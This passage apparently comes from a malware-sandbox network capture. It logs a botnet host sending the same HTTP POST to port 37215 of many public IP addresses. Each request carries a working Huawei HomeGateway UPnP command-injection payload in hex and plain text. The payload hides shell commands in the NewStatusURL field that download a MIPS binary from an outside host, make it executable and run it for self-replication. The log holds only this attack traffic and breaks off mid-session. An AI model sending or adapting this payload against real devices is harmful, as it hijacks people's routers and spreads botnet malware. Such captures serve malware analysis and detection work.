                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1429192.168.2.136062241.60.119.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561754942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1430192.168.2.1343464197.253.105.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561769009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1431192.168.2.1341704157.48.51.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561794043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1432192.168.2.1350082197.22.0.25437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561798096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1433192.168.2.133717097.15.206.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561815977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1434192.168.2.134155083.43.180.4637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561830997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1435192.168.2.1337946193.50.149.5637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561850071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1436192.168.2.1347962157.116.124.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561862946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1437192.168.2.1335024106.27.87.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561876059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1438192.168.2.1350076197.186.11.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561888933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
